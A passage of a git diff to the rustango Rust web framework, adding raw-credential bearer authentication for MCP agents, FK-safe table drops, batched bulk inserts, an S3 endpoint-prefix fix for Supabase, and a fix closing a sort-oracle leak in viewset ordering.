-//! # Unified manage runner (since v0.16)
+//! # The manage runner
 //!
-//! Since v0.16 there is **one binary** that serves HTTP and dispatches
-//! manage commands. `cargo run` starts the server; `cargo run -- <verb>`
-//! runs a CLI command. A scaffolded `src/main.rs` looks like:
+//! One binary serves HTTP and dispatches CLI commands: `cargo run` starts the
+//! server, `cargo run -- <verb>` runs a command. A scaffolded `main.rs`:
 //!
 //! ```ignore
 //! #[rustango::main]
 //! async fn main() -> Result<(), Box<dyn std::error::Error>> {
 //!     let _ = dotenvy::dotenv();
 //!     rustango::manage::Cli::new()
-//!         .api(myblog::urls::router())
-//!         .tenancy()                                            // optional, with `tenancy` feature
-//!         .migrations_dir(std::path::Path::new(env!("CARGO_MANIFEST_DIR")).join("migrations"))
+//!         .api(myblog::urls::api())
+//!         .tenancy()                         // optional, with the `tenancy` feature
 //!         .run()
 //!         .await
 //! }
 //! ```
 //!
-//! Common manage verbs (every command supports `--help`):
+//! Common verbs (each supports `--help`):
 //!
 //! | Group | Verbs |
 //! |---|---|
-//! | Migrations | `makemigrations`, `migrate [target]`, `downgrade [N]`, `showmigrations`, `add-data-op` |
-//! | Scaffolders | `startapp <name>`, `make:viewset`, `make:serializer`, `make:form`, `make:job`, `make:notification`, `make:middleware`, `make:test` |
-//! | System | `about`, `check`, `check --deploy`, `version`, `docs` |
-//! | Tenancy | `create-tenant`, `create-operator`, `create-user`, `list-tenants`, `create-api-key`, `grant-perm`, `revoke-perm`, `audit-cleanup` |
+//! | Migrations | `makemigrations`, `migrate [target]`, `downgrade [N]`, `showmigrations` |
+//! | Scaffolders | `startapp`, `make:viewset`, `make:serializer`, `make:form`, `make:job`, `make:middleware`, `make:test` |
+//! | System | `about`, `check`, `check --deploy`, `version` |
+//! | Tenancy | `create-tenant`, `create-operator`, `create-user`, `list-tenants`, `create-api-key`, `grant-perm`, `audit-cleanup` |
 //!
-//! # Full reference
+//! # Where to look
 //!
-//! See the workspace [README](https://github.com/ujeenet/rustango)
-//! for the complete feature matrix, ORM cookbook, viewset / serializer
-//! recipes, multi-tenancy guide, and production checklist. The
+//! - Models & queries — [`core`], [`sql`]
+//! - Admin — [`admin`]
+//! - REST — [`viewset`], [`serializer`]
+//! - Multi-tenancy — [`tenancy`]
+//! - Auth — [`auth_backends`], [`jwt`], [`sso`]
+//! - Background work — [`jobs`], [`scheduler`]
+//! - Caching — [`cache`]
+//!
+//! The workspace [README](https://github.com/ujeenet/rustango) has the full
+//! feature matrix and guides, and
 //! [`examples/cookbook_blog`](https://github.com/ujeenet/rustango/tree/main/crates/rustango/examples/cookbook_blog)
-//! crate ships a runnable multi-tenant blog with one chapter per
-//! feature surface.
+//! is a runnable multi-tenant blog with one chapter per feature.
 
 // Lets `::rustango::core::Model` (emitted by the proc-macro) and
 // `rustango::sql::Auto<i64>` (used in tenancy source code carried

--- a/crates/rustango/src/mcp/auth.rs
+++ b/crates/rustango/src/mcp/auth.rs
@@ -236,23 +236,39 @@ pub(crate) async fn post_authed(
     let Some(token) = bearer(&headers) else {
         return unauthorized(&headers, &uri);
     };
-    let Some(agent) = verify_agent_token(jwt, token, &t.org.slug).await else {
-        return unauthorized(&headers, &uri);
-    };
-    // Revocation immediacy: the JWT is stateless, so re-check at request time
-    // that the agent (and, for a user-owned key, its owner) still exists and is
-    // active. A revoked / deactivated key is refused straight away rather than
-    // lingering until the token expires.
-    match crate::tenancy::agent_token_still_valid_pool(t.pool(), agent.agent_id, agent.user_id)
-        .await
-    {
-        Ok(true) => {}
-        Ok(false) => return unauthorized(&headers, &uri),
-        Err(e) => {
-            tracing::warn!(error = %e, "mcp agent liveness re-check failed");
-            return (StatusCode::INTERNAL_SERVER_ERROR, "auth check failed").into_response();
+    // Two accepted bearer shapes: a minted agent JWT, or the raw
+    // `prefix.secret` credential itself (epic #1013) — the copy-paste key a member
+    // generates in an app's UI works directly in any MCP client without a
+    // token-exchange step. The raw path verifies liveness and resolves grants
+    // per request inside [`verify_raw_agent_credential`], so RBAC changes and
+    // revocation apply immediately (no 15-minute JWT window).
+    let agent = match verify_agent_token(jwt, token, &t.org.slug).await {
+        Some(agent) => {
+            // Revocation immediacy: the JWT is stateless, so re-check at
+            // request time that the agent (and, for a user-owned key, its
+            // owner) still exists and is active. A revoked / deactivated key
+            // is refused straight away rather than lingering until expiry.
+            match crate::tenancy::agent_token_still_valid_pool(
+                t.pool(),
+                agent.agent_id,
+                agent.user_id,
+            )
+            .await
+            {
+                Ok(true) => agent,
+                Ok(false) => return unauthorized(&headers, &uri),
+                Err(e) => {
+                    tracing::warn!(error = %e, "mcp agent liveness re-check failed");
+                    return (StatusCode::INTERNAL_SERVER_ERROR, "auth check failed")
+                        .into_response();
+                }
+            }
         }
-    }
+        None => match verify_raw_agent_credential(t.pool(), &t.org.slug, token).await {
+            Some(agent) => agent,
+            None => return unauthorized(&headers, &uri),
+        },
+    };
     // Agent verified + tenant-pinned: hand the tools layer the resolved
     // tenant pool + principal so `tools/call` runs against the right tenant.
     let ctx = super::tools::McpContext {
@@ -263,6 +279,137 @@ pub(crate) async fn post_authed(
         cancel: super::progress::CancelToken::never(),
     };
     handle_message(&state, &body, Some(ctx)).await
+}
+
+/// Resolve a raw `prefix.secret` agent credential presented directly as the
+/// Bearer token (epic #1013). Returns the same [`McpAgent`] shape
+/// [`verify_agent_token`] yields, or `None` for any failure — fail-closed.
+///
+/// This is the copy-paste path: the show-once key a member generates works
+/// directly in any MCP client (`Authorization: Bearer <prefix.secret>`)
+/// without a token-exchange step. Liveness
+/// ([`crate::tenancy::agent_token_still_valid_pool`]) and grant resolution
+/// run on **every request**, so a user-owned key always reflects its owner's
+/// live RBAC and revocation is immediate — strictly fresher than a minted
+/// JWT's claim snapshot.
+///
+/// Cost control: the argon2 verification is the expensive step, so a
+/// successful verification is remembered for [`RAW_KEY_CACHE_TTL`] in a
+/// small bounded, process-local cache keyed by `(tenant, sha256(token))`.
+/// Only the *hash check* is skipped on a cache hit — liveness and grants are
+/// never cached. A garbage bearer never reaches argon2: the shape gate
+/// requires a `prefix.secret` split, and
+/// [`crate::tenancy::authenticate_agent_by_prefix_pool`] burns a dummy
+/// verification for unknown prefixes to stay timing-neutral (#1099).
+pub async fn verify_raw_agent_credential(
+    pool: &crate::sql::Pool,
+    slug: &str,
+    token: &str,
+) -> Option<McpAgent> {
+    // Shape gate: credentials are `<8-hex prefix>.<hex secret>` (see
+    // `tenancy::agents::generate_credential`) — anything else (a JWT, a
+    // random string) is refused before any DB or argon2 work.
+    let (prefix, secret) = token.split_once('.')?;
+    let is_hex = |s: &str| !s.is_empty() && s.bytes().all(|b| b.is_ascii_hexdigit());
+    if prefix.len() != 8 || !is_hex(prefix) || !is_hex(secret) {
+        return None;
+    }
+
+    let cache_key = raw_key_cache_key(slug, token);
+    let (agent_id, user_id) = match raw_key_cache_get(&cache_key) {
+        Some(hit) => hit,
+        None => {
+            let agent =
+                match crate::tenancy::authenticate_agent_by_prefix_pool(pool, prefix, secret).await
+                {
+                    Ok(Some(a)) => a,
+                    Ok(None) => return None,
+                    Err(e) => {
+                        tracing::warn!(error = %e, "mcp raw-key authentication failed");
+                        return None;
+                    }
+                };
+            let agent_id = agent.id.get().copied().unwrap_or_default();
+            raw_key_cache_put(cache_key, (agent_id, agent.user_id));
+            (agent_id, agent.user_id)
+        }
+    };
+
+    // Liveness on every request (covers the cache-hit path too): a revoked
+    // key or a deactivated owner is refused immediately.
+    match crate::tenancy::agent_token_still_valid_pool(pool, agent_id, user_id).await {
+        Ok(true) => {}
+        Ok(false) => return None,
+        Err(e) => {
+            tracing::warn!(error = %e, "mcp raw-key liveness check failed");
+            return None;
+        }
+    }
+
+    // Grants resolve fresh on every request — never cached.
+    let grants = match user_id {
+        Some(uid) => crate::tenancy::resolve_user_agent_grants_pool(pool, agent_id, uid).await,
+        None => crate::tenancy::resolve_agent_grants_pool(pool, agent_id).await,
+    };
+    let (skills, tools) = match grants {
+        Ok(g) => g,
+        Err(e) => {
+            tracing::warn!(error = %e, "mcp raw-key grant resolution failed");
+            return None;
+        }
+    };
+    Some(McpAgent {
+        agent_id,
+        tenant: slug.to_owned(),
+        skills,
+        tools,
+        user_id,
+        jti: format!("raw:{agent_id}"),
+    })
+}
+
+/// TTL for a positive raw-key verification (argon2 skip window).
+const RAW_KEY_CACHE_TTL: std::time::Duration = std::time::Duration::from_secs(60);
+/// Bound on cached verifications; oldest entries are evicted past this.
+const RAW_KEY_CACHE_CAP: usize = 256;
+
+type RawKeyCache = std::collections::HashMap<[u8; 32], ((i64, Option<i64>), std::time::Instant)>;
+
+fn raw_key_cache() -> &'static std::sync::Mutex<RawKeyCache> {
+    static CACHE: std::sync::OnceLock<std::sync::Mutex<RawKeyCache>> = std::sync::OnceLock::new();
+    CACHE.get_or_init(|| std::sync::Mutex::new(std::collections::HashMap::new()))
+}
+
+/// Cache key = SHA-256 over `tenant \0 token` — tenant-scoped so a credential
+/// verified against one tenant's pool can never authenticate on another.
+fn raw_key_cache_key(slug: &str, token: &str) -> [u8; 32] {
+    use sha2::Digest as _;
+    let mut hasher = sha2::Sha256::new();
+    hasher.update(slug.as_bytes());
+    hasher.update([0u8]);
+    hasher.update(token.as_bytes());
+    hasher.finalize().into()
+}
+
+fn raw_key_cache_get(key: &[u8; 32]) -> Option<(i64, Option<i64>)> {
+    let cache = raw_key_cache().lock().ok()?;
+    let (identity, verified_at) = cache.get(key)?;
+    (verified_at.elapsed() < RAW_KEY_CACHE_TTL).then_some(*identity)
+}
+
+fn raw_key_cache_put(key: [u8; 32], identity: (i64, Option<i64>)) {
+    let Ok(mut cache) = raw_key_cache().lock() else {
+        return;
+    };
+    if cache.len() >= RAW_KEY_CACHE_CAP {
+        // Drop expired entries first; if still over cap, clear outright —
+        // the cache is a pure optimization and refilling costs one argon2.
+        cache.retain(|_, (_, at)| at.elapsed() < RAW_KEY_CACHE_TTL);
+        if cache.len() >= RAW_KEY_CACHE_CAP {
+            cache.clear();
+        }
+    }
+    cache.insert(key, (identity, std::time::Instant::now()));
 }
 
 pub(crate) fn bearer(headers: &HeaderMap) -> Option<&str> {

--- a/crates/rustango/src/mcp/mod.rs
+++ b/crates/rustango/src/mcp/mod.rs
@@ -36,7 +36,7 @@ mod transport;
 mod types;
 pub mod utilities;
 
-pub use auth::{issue_agent_token, verify_agent_token, McpAgent};
+pub use auth::{issue_agent_token, verify_agent_token, verify_raw_agent_credential, McpAgent};
 pub use notifications::{
     notify_prompts_list_changed, notify_resources_list_changed, notify_tools_list_changed,
 };

--- a/crates/rustango/src/mcp/router.rs
+++ b/crates/rustango/src/mcp/router.rs
@@ -77,10 +77,9 @@ pub fn secure_tenant_router() -> Router {
     tenant_router_authed(default_jwt())
 }
 
-/// Defensive cap on a JSON-RPC request body (tighter than axum's 2 MiB
-/// default). MCP messages are small; this bounds a hostile oversized payload.
-#[cfg(feature = "config")]
-const MCP_MAX_BODY_BYTES: usize = 1024 * 1024;
+// The JSON-RPC body cap defaults to 1 MiB (tighter than axum's 2 MiB) and
+// is configurable via `[mcp] max_body_bytes` for hosts whose tools accept
+// inline payloads (e.g. base64 media uploads).
 
 /// Agent-guarded tenant router configured from `[mcp]` settings. Applies the
 /// full knob set (#1098): `token_ttl_secs` → agent-token lifetime,
@@ -114,10 +113,10 @@ pub fn secure_tenant_router_from_settings(settings: &crate::config::McpSettings)
             std::time::Duration::from_secs(60),
         ));
     }
-    // Defensive body cap on every MCP route.
+    // Defensive body cap on every MCP route (`[mcp] max_body_bytes`).
     {
         use crate::body_limit::{BodyLimitLayer, BodyLimitRouterExt};
-        router = router.body_limit(BodyLimitLayer::new(MCP_MAX_BODY_BYTES));
+        router = router.body_limit(BodyLimitLayer::new(settings.max_body_bytes()));
     }
     router
 }

--- a/crates/rustango/src/migrate/ddl.rs
+++ b/crates/rustango/src/migrate/ddl.rs
@@ -174,6 +174,57 @@ pub fn drop_table_sql_with_dialect(
     s
 }
 
+/// The inverse of [`create_constraints_sql_with_dialect`]: one statement
+/// per FK / O2O field and per composite FK, dropping the constraint that
+/// the create emitter named `{table}_{column}_fkey`.
+///
+/// Needed because `DROP TABLE` is only FK-safe on two of the three
+/// dialects: Postgres has `CASCADE`, SQLite leaves `foreign_keys` off by
+/// default, but MySQL enforces FKs and rejects `CASCADE` — so dropping a
+/// parent before its child fails outright (#1277). Dropping constraints
+/// first makes table drop order irrelevant, mirroring the way
+/// [`create_constraints_sql_with_dialect`] makes create order irrelevant.
+///
+/// Returns empty for dialects that inline FKs in `CREATE TABLE` (SQLite):
+/// there is no named constraint to drop, and the table drop is unimpeded.
+///
+/// The statements are best-effort by nature — a constraint may already be
+/// gone, and only Postgres can say `IF EXISTS` here (MySQL's
+/// `DROP FOREIGN KEY` has no such form), so callers should ignore errors.
+#[must_use]
+pub fn drop_constraints_sql_with_dialect(
+    dialect: &dyn Dialect,
+    model: &ModelSchema,
+) -> Vec<String> {
+    if dialect.inline_fks_in_create_table() {
+        return Vec::new();
+    }
+    // MySQL spells it `DROP FOREIGN KEY`; Postgres `DROP CONSTRAINT`,
+    // which additionally accepts `IF EXISTS`.
+    let mysql = dialect.name() == "mysql";
+    let mut out = Vec::new();
+    let mut push = |name: String| {
+        let mut s = String::from("ALTER TABLE ");
+        s.push_str(&dialect.quote_ident(model.table));
+        if mysql {
+            s.push_str(" DROP FOREIGN KEY ");
+        } else {
+            s.push_str(" DROP CONSTRAINT IF EXISTS ");
+        }
+        s.push_str(&dialect.quote_ident(&name));
+        out.push(s);
+    };
+    for field in model.scalar_fields() {
+        if field.relation.is_some() {
+            push(format!("{}_{}_fkey", model.table, field.column));
+        }
+    }
+    for rel in model.composite_relations {
+        push(format!("{}_{}_fkey", model.table, rel.name));
+    }
+    out
+}
+
 /// One `ALTER TABLE … ADD CONSTRAINT … FOREIGN KEY` per FK / O2O field,
 /// plus one per composite FK declared via `#[rustango(fk_composite(...))]`
 /// (sub-slice F.2 of the v0.15.0 ContentType plan). MySQL accepts the

--- a/crates/rustango/src/migrate/manage.rs
+++ b/crates/rustango/src/migrate/manage.rs
@@ -408,7 +408,11 @@ fn print_help<W: Write>(w: &mut W) -> std::io::Result<()> {
         "      --model limits to a single model; pass multiple times for a set.\n"
     )?;
     writeln!(w, "  docs")?;
-    writeln!(w, "      Open docs.rs/rustango in the default browser.\n")?;
+    writeln!(
+        w,
+        "      Open docs.rs/rustango in the default browser. Set \
+         RUSTANGO_NO_BROWSER to just print the URL.\n"
+    )?;
     writeln!(w, "  version | --version")?;
     writeln!(w, "      Print the rustango framework version.\n")?;
     writeln!(
@@ -1812,9 +1816,19 @@ async fn check_cmd<W: Write>(
 }
 
 /// `manage docs` — try to open https://docs.rs/rustango in the user's browser.
+///
+/// The URL is always printed; the browser launch is skipped under `cfg!(test)`
+/// and when `RUSTANGO_NO_BROWSER` is set. Without the test guard this verb
+/// really did open a browser during `cargo test`: `docs` is in the pool-free
+/// verb list that `pool_free_verbs_need_no_database` dispatches, so every
+/// `cargo test --lib` spawned a tab. `RUSTANGO_NO_BROWSER` covers the same
+/// nuisance for headless and CI shells, which have nothing to open.
 fn docs_cmd<W: Write>(w: &mut W) -> Result<(), MigrateError> {
     let url = "https://docs.rs/rustango";
     writeln!(w, "{url}")?;
+    if cfg!(test) || std::env::var_os("RUSTANGO_NO_BROWSER").is_some() {
+        return Ok(());
+    }
     // Best-effort — don't fail if the OS has no `open` / `xdg-open` / `start`
     let opener = if cfg!(target_os = "macos") {
         Some(("open", url))

--- a/crates/rustango/src/migrate/runner.rs
+++ b/crates/rustango/src/migrate/runner.rs
@@ -401,7 +401,19 @@ pub async fn drop_all_pool(pool: &crate::sql::Pool) -> Result<(), MigrateError> 
     let dialect = pool.dialect();
     // Cascade only emitted for PG — MySQL parses it as syntax error.
     let cascade = dialect.name() == "postgres";
-    for model in bootstrap_models() {
+    let models = bootstrap_models();
+    // Phase 1 — drop FK constraints, so table drop order can't matter.
+    // The mirror of `apply_all`'s two-phase create. Without it MySQL, which
+    // enforces FKs and has no `DROP TABLE … CASCADE`, fails as soon as a
+    // parent is dropped before its child (#1277). Best-effort: a constraint
+    // may already be absent, and only PG can say `IF EXISTS` here.
+    for model in &models {
+        for sql in ddl::drop_constraints_sql_with_dialect(dialect, model) {
+            let _ = crate::sql::raw_execute_pool(pool, &sql, ::std::vec::Vec::new()).await;
+        }
+    }
+    // Phase 2 — drop the tables themselves.
+    for model in &models {
         let sql =
             ddl::drop_table_sql_with_dialect(dialect, model, /* if_exists */ true, cascade);
         crate::sql::raw_execute_pool(pool, &sql, ::std::vec::Vec::new()).await?;

--- a/crates/rustango/src/sql/dialect.rs
+++ b/crates/rustango/src/sql/dialect.rs
@@ -120,6 +120,24 @@ pub trait Dialect {
         false
     }
 
+    /// Maximum bind parameters the backend accepts in one statement.
+    ///
+    /// Every backend has a ceiling, and a multi-row `INSERT` reaches it
+    /// at `rows × columns` (#1284):
+    ///
+    /// * **Postgres** — 65535, a hard protocol limit (the parameter
+    ///   count is an `int16` on the wire).
+    /// * **SQLite** — `SQLITE_MAX_VARIABLE_NUMBER`, 32766 since 3.32
+    ///   (999 before it; sqlx bundles a modern build).
+    /// * **MySQL** — no fixed cap; bounded by `max_allowed_packet`.
+    ///   65535 is a safe proxy well inside the default 64 MiB.
+    ///
+    /// The default is Postgres' figure — the most conservative of the
+    /// three that is also correct for a hard-limit backend.
+    fn max_bind_params(&self) -> usize {
+        65535
+    }
+
     /// Translate a `DEFAULT` expression authored in Postgres dialect
     /// (the rustango canonical form) to the target backend's spelling.
     /// `ty` is the field's `FieldType` token (e.g. `"json"`, `"datetime"`,

--- a/crates/rustango/src/sql/executor/mod.rs
+++ b/crates/rustango/src/sql/executor/mod.rs
@@ -1271,8 +1271,44 @@ pub async fn bulk_insert_pool(pool: &Pool, query: &BulkInsertQuery) -> Result<()
     if query.rows.is_empty() {
         return Ok(());
     }
-    let stmt = pool.dialect().compile_bulk_insert(query)?;
-    execute_pool(pool, &stmt.sql, stmt.params).await?;
+    // Every `pool.dialect()` here is a short-lived temporary, deliberately
+    // not bound to a variable: it yields `&dyn Dialect`, which is not
+    // `Sync`, so holding one across an `.await` makes this future non-Send
+    // and breaks every boxed handler that transitively calls it.
+    //
+    // Split into batches that fit the backend's bind-parameter ceiling
+    // (#1284). One multi-row INSERT binds `rows × columns` parameters,
+    // and every backend caps that — 65535 on Postgres (an int16 on the
+    // wire), 32766 on modern SQLite, `max_allowed_packet` on MySQL. A
+    // single statement past the cap fails with an opaque driver error,
+    // so an 8-column model died at ~8k rows on PG and ~4k on SQLite.
+    // Django's `bulk_create` batches for the same reason.
+    //
+    // Small inserts are untouched: under the ceiling this is the same
+    // single statement it always was. Only oversized batches split, and
+    // those previously failed outright.
+    //
+    // Note the trade-off, which matches Django's: above the threshold
+    // this is no longer one statement, so a mid-way failure leaves the
+    // earlier chunks committed. Callers needing all-or-nothing should
+    // wrap the call in a transaction.
+    let columns = query.columns.len().max(1);
+    let max_rows = (pool.dialect().max_bind_params() / columns).max(1);
+
+    if query.rows.len() <= max_rows {
+        let stmt = pool.dialect().compile_bulk_insert(query)?;
+        execute_pool(pool, &stmt.sql, stmt.params).await?;
+        return Ok(());
+    }
+
+    for chunk in query.rows.chunks(max_rows) {
+        let batch = BulkInsertQuery {
+            rows: chunk.to_vec(),
+            ..query.clone()
+        };
+        let stmt = pool.dialect().compile_bulk_insert(&batch)?;
+        execute_pool(pool, &stmt.sql, stmt.params).await?;
+    }
     Ok(())
 }
 

--- a/crates/rustango/src/sql/sqlite.rs
+++ b/crates/rustango/src/sql/sqlite.rs
@@ -78,6 +78,15 @@ impl Dialect for Sqlite {
         true
     }
 
+    /// `SQLITE_MAX_VARIABLE_NUMBER` — 32766 since SQLite 3.32 (it was
+    /// 999 before). sqlx bundles a modern build, so 32766 is right
+    /// here; a host linking an ancient system SQLite would need the
+    /// lower figure. Half Postgres' ceiling, so an 8-column model
+    /// chunks at ~4k rows rather than ~8k (#1284).
+    fn max_bind_params(&self) -> usize {
+        32766
+    }
+
     fn supports_returning(&self) -> bool {
         // SQLite ≥ 3.35 (released 2021-03). Lower versions reject the
         // clause; rustango doesn't try to detect the runtime version

--- a/crates/rustango/src/storage/s3.rs
+++ b/crates/rustango/src/storage/s3.rs
@@ -80,6 +80,14 @@ pub struct S3Storage {
     http: reqwest::Client,
 }
 
+/// Endpoint minus its `http(s)://` scheme, if any.
+fn strip_scheme(endpoint: &str) -> &str {
+    endpoint
+        .strip_prefix("https://")
+        .or_else(|| endpoint.strip_prefix("http://"))
+        .unwrap_or(endpoint)
+}
+
 impl S3Storage {
     #[must_use]
     pub fn new(cfg: S3Config) -> Self {
@@ -97,14 +105,18 @@ impl S3Storage {
         self
     }
 
+    /// Bare authority (`host[:port]`) — never a path.
+    ///
+    /// This is sent as the `Host` header *and* signed as the SigV4
+    /// `host:` canonical header, so it must not carry the endpoint's
+    /// path. Endpoints that include one (Supabase Storage exposes its
+    /// S3 API at `https://<ref>.storage.supabase.co/storage/v1/s3`)
+    /// used to leak it into both, producing an invalid `Host` that
+    /// proxies reject with 400 before S3 ever sees the request.
     fn host(&self) -> String {
         if let Some(ep) = &self.cfg.endpoint {
-            // Strip scheme + trailing slash to get bare host.
-            let no_scheme = ep
-                .strip_prefix("https://")
-                .or_else(|| ep.strip_prefix("http://"))
-                .unwrap_or(ep);
-            no_scheme.trim_end_matches('/').to_owned()
+            let no_scheme = strip_scheme(ep);
+            no_scheme.split('/').next().unwrap_or(no_scheme).to_owned()
         } else if self.cfg.path_style {
             format!("s3.{}.amazonaws.com", self.cfg.region)
         } else {
@@ -121,20 +133,30 @@ impl S3Storage {
         "https"
     }
 
-    /// URL path component for a key: `/key` (virtual) or
-    /// `/bucket/key` (path style).
+    /// Path prefix carried by a custom endpoint — `/storage/v1/s3` for
+    /// Supabase Storage, empty for a bare-host endpoint (AWS, R2,
+    /// MinIO). It belongs to both the request target and the signed
+    /// canonical path, or the signature covers a different resource
+    /// than the one requested.
+    fn endpoint_prefix(&self) -> String {
+        let Some(ep) = &self.cfg.endpoint else {
+            return String::new();
+        };
+        let no_scheme = strip_scheme(ep).trim_end_matches('/');
+        match no_scheme.find('/') {
+            Some(i) => no_scheme[i..].to_owned(),
+            None => String::new(),
+        }
+    }
+
+    /// URL path component for a key: `<prefix>/key` (virtual-hosted —
+    /// bucket lives in the host) or `<prefix>/bucket/key` (path style).
     fn key_path(&self, key: &str) -> String {
-        if self.cfg.path_style || self.cfg.endpoint.is_some() {
-            // Custom endpoints typically use path-style.
-            if self.cfg.path_style {
-                format!("/{}/{}", self.cfg.bucket, encode_key(key))
-            } else {
-                // Custom endpoint, virtual-hosted: bucket is in the
-                // host, so path is just the key.
-                format!("/{}", encode_key(key))
-            }
+        let prefix = self.endpoint_prefix();
+        if self.cfg.path_style {
+            format!("{prefix}/{}/{}", self.cfg.bucket, encode_key(key))
         } else {
-            format!("/{}", encode_key(key))
+            format!("{prefix}/{}", encode_key(key))
         }
     }
 
@@ -701,5 +723,82 @@ mod tests {
             .presigned_put_url("x", std::time::Duration::from_secs(60), None)
             .await
             .is_none());
+    }
+
+    // -------- Endpoints that carry a path prefix (Supabase Storage)
+
+    fn supabase_cfg() -> S3Config {
+        S3Config {
+            endpoint: Some("https://abc123.storage.supabase.co/storage/v1/s3".into()),
+            bucket: "media".into(),
+            region: "us-west-2".into(),
+            path_style: true,
+            ..cfg()
+        }
+    }
+
+    #[test]
+    fn host_is_the_bare_authority_even_when_the_endpoint_has_a_path() {
+        // Sent as the `Host` header and signed as the canonical
+        // `host:` header — a path here is an invalid Host, which
+        // proxies reject with 400 before S3 sees the request.
+        let s = S3Storage::new(supabase_cfg());
+        assert_eq!(s.host(), "abc123.storage.supabase.co");
+    }
+
+    #[test]
+    fn endpoint_path_prefix_is_kept_in_the_request_path() {
+        let s = S3Storage::new(supabase_cfg());
+        assert_eq!(s.endpoint_prefix(), "/storage/v1/s3");
+        assert_eq!(s.key_path("a/b.png"), "/storage/v1/s3/media/a/b.png");
+        assert_eq!(
+            s.full_url("a/b.png"),
+            "https://abc123.storage.supabase.co/storage/v1/s3/media/a/b.png",
+        );
+    }
+
+    #[test]
+    fn bare_host_endpoints_are_unaffected() {
+        // MinIO / R2 style: no path prefix, so nothing changes.
+        let s = S3Storage::new(S3Config {
+            endpoint: Some("http://127.0.0.1:9000".into()),
+            bucket: "media".into(),
+            path_style: true,
+            ..cfg()
+        });
+        assert_eq!(s.host(), "127.0.0.1:9000");
+        assert_eq!(s.endpoint_prefix(), "");
+        assert_eq!(s.key_path("a.png"), "/media/a.png");
+        assert_eq!(s.full_url("a.png"), "http://127.0.0.1:9000/media/a.png");
+    }
+
+    #[test]
+    fn aws_endpoints_are_unaffected() {
+        // No custom endpoint: virtual-hosted by default, path-style on request.
+        let virt = S3Storage::new(cfg());
+        assert_eq!(virt.host(), "examplebucket.s3.us-east-1.amazonaws.com");
+        assert_eq!(virt.endpoint_prefix(), "");
+        assert_eq!(virt.key_path("a.png"), "/a.png");
+
+        let path = S3Storage::new(S3Config {
+            path_style: true,
+            ..cfg()
+        });
+        assert_eq!(path.host(), "s3.us-east-1.amazonaws.com");
+        assert_eq!(path.key_path("a.png"), "/examplebucket/a.png");
+    }
+
+    #[test]
+    fn signed_canonical_path_matches_the_url_path() {
+        // The signature covers `key_path`; if the URL carried the
+        // endpoint prefix and the canonical path did not, every
+        // request would fail SignatureDoesNotMatch.
+        let s = S3Storage::new(supabase_cfg());
+        let url = s.full_url("a/b.png");
+        let signed_path = s.key_path("a/b.png");
+        assert!(
+            url.ends_with(&signed_path),
+            "url {url} must end with signed path {signed_path}",
+        );
     }
 }

--- a/crates/rustango/src/tenancy/agents.rs
+++ b/crates/rustango/src/tenancy/agents.rs
@@ -232,6 +232,42 @@ pub async fn authenticate_agent_pool(
     }
 }
 
+/// Authenticate a full `prefix.secret` credential by its **secret prefix**
+/// (the lookup half) rather than the agent name — the shape a bearer token
+/// carries when the raw credential itself is presented (epic #1013), where the
+/// client never knows the agent's name. Same fail-closed + timing-neutral
+/// contract as [`authenticate_agent_pool`].
+///
+/// # Errors
+/// Propagates DB errors only; an unverifiable secret is `Ok(None)`.
+pub async fn authenticate_agent_by_prefix_pool(
+    pool: &Pool,
+    prefix: &str,
+    secret: &str,
+) -> Result<Option<Agent>, AgentError> {
+    use crate::core::Column as _;
+    use crate::sql::FetcherPool as _;
+
+    let Some(agent) = Agent::objects()
+        .where_(Agent::secret_prefix.eq(prefix))
+        .limit(1)
+        .fetch(pool)
+        .await?
+        .into_iter()
+        .next()
+        .filter(|a| a.active)
+    else {
+        // Timing-neutral for unknown prefixes (#1099).
+        super::password::verify_dummy(secret);
+        return Ok(None);
+    };
+
+    match super::password::verify(secret, &agent.secret_hash) {
+        Ok(true) => Ok(Some(agent)),
+        _ => Ok(None),
+    }
+}
+
 // ============================================================= skills (Slice 4)
 // Skills are the grant unit (epic #1013, Slice 4 / #1017): a skill bundles a
 // set of tools (+ a prompt + resources, Slice 5). Granting a skill to an agent

--- a/crates/rustango/src/tenancy/mod.rs
+++ b/crates/rustango/src/tenancy/mod.rs
@@ -116,13 +116,14 @@ pub mod tenant_console;
 
 #[cfg(feature = "mcp")]
 pub use agents::{
-    add_skill_resource_pool, agent_token_still_valid_pool, authenticate_agent_pool,
-    create_agent_pool, create_skill_pool, create_user_key_pool, delete_user_keys_pool,
-    grant_skill_pool, list_agents_pool, list_skills_pool, list_user_keys_pool,
-    map_skill_to_permission_pool, resolve_agent_grants_pool, resolve_user_agent_grants_pool,
-    resources_for_skills_pool, revoke_skill_pool, revoke_user_key_pool, rotate_agent_secret_pool,
-    skills_by_codenames_pool, unmap_skill_from_permission_pool, Agent, AgentError, AgentGrant,
-    AgentSecret, AgentSkill, AgentSkillPermission, AgentSkillResource, AgentSkillTool,
+    add_skill_resource_pool, agent_token_still_valid_pool, authenticate_agent_by_prefix_pool,
+    authenticate_agent_pool, create_agent_pool, create_skill_pool, create_user_key_pool,
+    delete_user_keys_pool, grant_skill_pool, list_agents_pool, list_skills_pool,
+    list_user_keys_pool, map_skill_to_permission_pool, resolve_agent_grants_pool,
+    resolve_user_agent_grants_pool, resources_for_skills_pool, revoke_skill_pool,
+    revoke_user_key_pool, rotate_agent_secret_pool, skills_by_codenames_pool,
+    unmap_skill_from_permission_pool, Agent, AgentError, AgentGrant, AgentSecret, AgentSkill,
+    AgentSkillPermission, AgentSkillResource, AgentSkillTool,
 };
 #[cfg(feature = "postgres")]
 pub use auth::{authenticate_operator, authenticate_user};

--- a/crates/rustango/src/viewset/mod.rs
+++ b/crates/rustango/src/viewset/mod.rs
@@ -1770,11 +1770,27 @@ async fn run_list(
     // #809 — was a hand-rolled `-`-prefix split + allowlist filter +
     // schema-field lookup. Route through `list_params::parse_ordering`
     // (single source of truth shared with template_views::ListView).
+    // #1282 — with no explicit `ordering_fields`, fall back to the fields
+    // this ViewSet actually *exposes* rather than every column on the
+    // model. The comment above described this protection, but an empty
+    // allowlist skipped the check entirely, so a ViewSet declaring
+    // `fields = "id, title"` still honoured `?ordering=password_hash` —
+    // a sort oracle over a column the API never returns. DRF defaults to
+    // the serializer's readable fields for the same reason. When `fields`
+    // is unset, `effective_fields` is every scalar column, so the
+    // permissive behaviour is retained exactly where it is harmless.
+    let ordering_allowlist: Vec<String> = if state.vs.ordering_fields.is_empty() {
+        state
+            .effective_fields()
+            .iter()
+            .map(|f| f.name.to_owned())
+            .collect()
+    } else {
+        state.vs.ordering_fields.clone()
+    };
     let order_by: Vec<crate::core::OrderItem> = params
         .get("ordering")
-        .map(|raw| {
-            crate::list_params::parse_ordering(raw, &state.vs.ordering_fields, state.vs.schema)
